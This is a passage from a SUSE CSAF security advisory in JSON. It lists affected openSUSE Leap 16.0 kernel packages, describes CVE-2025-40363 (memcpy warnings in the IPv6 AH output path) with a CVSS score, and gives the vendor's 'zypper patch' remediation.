"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-40261"
},
{
"cve": "CVE-2025-40363",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40363"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipv6: fix field-spanning memcpy warning in AH output\n\nFix field-spanning memcpy warnings in ah6_output() and\nah6_output_done() where extension headers are copied to/from IPv6\naddress fields, triggering fortify-string warnings about writes beyond\nthe 16-byte address fields.\n\n memcpy: detected field-spanning write (size 40) of single field \"\u0026top_iph-\u003esaddr\" at net/ipv6/ah6.c:439 (size 16)\n WARNING: CPU: 0 PID: 8838 at net/ipv6/ah6.c:439 ah6_output+0xe7e/0x14e0 net/ipv6/ah6.c:439\n\nThe warnings are false positives as the extension headers are\nintentionally placed after the IPv6 header in memory. Fix by properly\ncopying addresses and extension headers separately, and introduce\nhelper functions to avoid code duplication.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40363",
"url": "https://www.suse.com/security/cve/CVE-2025-40363"
},
{
"category": "external",
"summary": "SUSE Bug 1255102 for CVE-2025-40363",
"url": "https://bugzilla.suse.com/1255102"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
